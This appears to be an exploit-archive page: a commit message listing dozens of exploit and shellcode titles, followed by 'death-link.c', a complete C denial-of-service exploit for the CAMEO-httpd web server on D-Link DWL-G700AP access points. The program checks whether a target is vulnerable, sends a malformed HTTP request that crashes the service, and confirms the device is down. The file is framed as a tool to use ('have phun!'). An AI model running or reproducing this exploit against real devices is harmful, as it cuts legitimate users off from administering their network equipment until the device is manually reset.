880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
191 lines
No EOL
8.1 KiB
C
191 lines
No EOL
8.1 KiB
C
// source: https://www.securityfocus.com/bid/16690/info
|
|
|
|
D-Link DWL-G700AP HTTPD is prone to a remote denial-of-service vulnerability. This issue is due to a failure in the 'httpd' service to properly handle malformed data.
|
|
|
|
An attacker can exploit this issue to crash the affected webserver, effectively denying service to legitimate users. The affected device must be manually reset to restart the affected service.
|
|
|
|
This issue is reported to affect firmware versions 2.00 and 2.01; other firmware versions may also be vulnerable.
|
|
|
|
/*
|
|
death-link.c
|
|
------------------------
|
|
written by l0om
|
|
WWW.EXCLUDED.ORG
|
|
------------------------
|
|
exploit tested on firmware: v2.00 and the latest v2.01
|
|
remote DoS exploit for the CAMEO-httpd which is running on the D-Link
|
|
Accesspoint DWL-G700AP. After executing this the accesspoint cannot be
|
|
configured anymore because the only way to administrate the AP is the
|
|
administration with your browser. you have to reboot the box to get the
|
|
httpd started again.
|
|
|
|
have phun!
|
|
|
|
// some greetings
|
|
maximilian, Prof. J. Dealer, Theldens, Commander Jansen, ole, detach,
|
|
mattball, molke, murfie, vy99
|
|
excluded.org people, IT31 people
|
|
|
|
// the guys who made exploiting possible with buying this AP
|
|
joerres, hermanns, schubert
|
|
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <netinet/in.h>
|
|
#include <sys/socket.h>
|
|
|
|
#define DOSSTRING "GET \n\n"
|
|
#define TARGET "CAMEO-httpd"
|
|
#define DESTPORT 80
|
|
|
|
int alive(char *ip);
|
|
int check_httpd(char *ip);
|
|
void help(void);
|
|
void header(void);
|
|
int DoS(char *ip);
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
int fd, i, check = 0;
|
|
char *ip = NULL;
|
|
|
|
header();
|
|
|
|
if(argc > 1)
|
|
for(i = 1; i < argc; i++)
|
|
if(argv[i][0] == '-')
|
|
switch(argv[i][1]) {
|
|
case 'o':
|
|
check = 2;
|
|
break;
|
|
case 'c':
|
|
check = 1;
|
|
break;
|
|
case 'h':
|
|
help();
|
|
break;
|
|
default:
|
|
printf("\t>> %s << unknown option\n",argv[i]);
|
|
exit(-1);
|
|
}
|
|
else ip = argv[i];
|
|
|
|
if(ip == NULL) help();
|
|
|
|
if(check) {
|
|
printf("\tchecking target... "); fflush(stdout);
|
|
i = check_httpd(ip);
|
|
if(i <= 0) {
|
|
printf("faild! ");
|
|
if(!i) printf("invalid target webserver\n");
|
|
else printf("webserver already dead?\n");
|
|
exit(-1);
|
|
}
|
|
else printf("done! valid victim detected\n");
|
|
if(check == 2) return 0;
|
|
}
|
|
|
|
printf("\tsending DoS... "); fflush(stdout);
|
|
if(DoS(ip) <= 0) {
|
|
printf("faild!\n");
|
|
return -1;
|
|
} else printf("done!\n");
|
|
|
|
sleep(1);
|
|
printf("\tchecking webserver status... "); fflush(stdout);
|
|
if(!alive(ip)) printf("%s DEAD\n",TARGET);
|
|
else printf("%s on %s is still alive :( \n",TARGET,ip);
|
|
|
|
return 0;
|
|
}
|
|
|
|
int check_httpd(char *ip)
|
|
{
|
|
int sockfd, nbytes, len, i = 0;
|
|
char buf[500], pattern[] = TARGET, *ptr;
|
|
struct sockaddr_in servaddr;
|
|
|
|
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
|
|
perror("socket");
|
|
exit(-1);
|
|
}
|
|
servaddr.sin_family = AF_INET;
|
|
servaddr.sin_port = htons(DESTPORT);
|
|
servaddr.sin_addr.s_addr = inet_addr(ip);
|
|
|
|
if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
|
|
return -1;
|
|
|
|
if(!write(sockfd, "GET / HTTP/1.0\n\n", 16))
|
|
return 0;
|
|
else nbytes = read(sockfd, buf, 500);
|
|
|
|
len = strlen(pattern);
|
|
ptr = buf;
|
|
|
|
while(nbytes--) {
|
|
if(*ptr == pattern[i])
|
|
i++;
|
|
else i = 0;
|
|
if(i == len) return 1;
|
|
else ptr++;
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
int alive(char *ip)
|
|
{
|
|
int sockfd, nbytes, len, i = 0;
|
|
char buf[500], pattern[] = TARGET, *ptr;
|
|
struct sockaddr_in servaddr;
|
|
|
|
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
|
|
perror("socket");
|
|
exit(-1);
|
|
}
|
|
servaddr.sin_family = AF_INET;
|
|
servaddr.sin_port = htons(DESTPORT);
|
|
servaddr.sin_addr.s_addr = inet_addr(ip);
|
|
|
|
if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
|
|
return 0;
|
|
else return 1;
|
|
}
|
|
|
|
int DoS(char *ip)
|
|
{
|
|
int sockfd, nbytes, len, i = 0;
|
|
char buf[500], pattern[] = TARGET, *ptr;
|
|
struct sockaddr_in servaddr;
|
|
|
|
if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
|
|
perror("socket");
|
|
exit(-1);
|
|
}
|
|
servaddr.sin_family = AF_INET;
|
|
servaddr.sin_port = htons(DESTPORT);
|
|
servaddr.sin_addr.s_addr = inet_addr(ip);
|
|
|
|
if(connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1)
|
|
return 0;
|
|
else return(write(sockfd, DOSSTRING, strlen(DOSSTRING)));
|
|
}
|
|
|
|
void help(void)
|
|
{
|
|
printf("\tdeath-link [options] <ip-address>\n");
|
|
printf("\t-o: ONLY CHECK for valid target\n");
|
|
printf("\t-c: check for valid target\n");
|
|
printf("\t-h: help\n");
|
|
exit(0);
|
|
}
|
|
|
|
void header(void)
|
|
{
|
|
printf("\tdeath-link - written by l0om\n");
|
|
printf("\t WWW.EXCLUDED.ORG\n");
|
|
printf("\tDoS %s D-Link DWL-G700AP\n\n",TARGET);
|
|
} |